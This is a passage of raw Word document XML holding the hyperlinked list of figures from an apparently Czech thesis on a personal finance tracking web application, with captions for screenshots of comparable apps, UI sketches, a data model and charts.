          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327907 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</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08" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 2. Graf zobrazující zastoupení jednotlivých způsobů sledování financí. [1]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327908 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</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09" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 3. Ukázka programu RQ Money. [4]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327909 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 4. Ukázka mobilní aplikace My Budget Book. [5]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327910 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 5. Ukázka přehledu transakcí v aplikaci eÚčty.cz. [6]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327911 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 6. Ukázka přehledu transakcí v aplikaci Moře financí. [7]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327912 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 7. Ukázka přehledu transakcí v aplikaci Toshl Finance. [8]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327913 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 8. Diagram aktérů.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327914 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 9. Schéma propojení jednotlivých stránek uživatelského rozhraní.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327915 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>75</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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 10. Náčrt formuláře pro vytvoření nového výdaje.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327916 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>76</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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 11. Náčrt stránky Přehled zobrazené na monitoru s vysokým rozlišením.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327917 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>77</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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 12. Náčrt stránky Přehled zobrazené na tabletu.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327918 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</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19" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 13. Náčrt stránky Přehled zobrazené na mobilním telefonu.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327919 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 14. Náčrt seznamu účtů v sekci Správa.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327920 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 15. Náčrt formuláře pro úpravu účtu v sekci Správa.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327921 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 16. Náčrt stránky Vozidla sloužící pro zobrazení statistik o evidovaném vozidle.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327922 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 17. Datový model aplikace.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327923 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 18. Přihlašovací obrazovka.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327924 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 19. Registrační formulář.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327925 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 20. Úvodní obrazovka po prvním přihlášení.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327926 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 21. Vytvoření nového účtu.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327927 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 22. Přehled evidovaných transakcí.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327928 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</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29" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 23. Formulář pro vytvoření nového výdaje.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327929 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 24. Filtr transakcí.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327930 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 25. Graf příjmů, výdajů a bilance s aktivní anotací.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327931 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 26. Graf vývoje stavu účtů s aktivní anotací.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327932 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 27. Graf podílu hlavních štítků na výdajích s aktivní anotací.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327933 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 28. Graf podílu jednotlivých štítků na výdajích s aktivní anotací.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327934 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Seznamobrzk"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327935" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 29. Uživatelské menu.</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327935 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
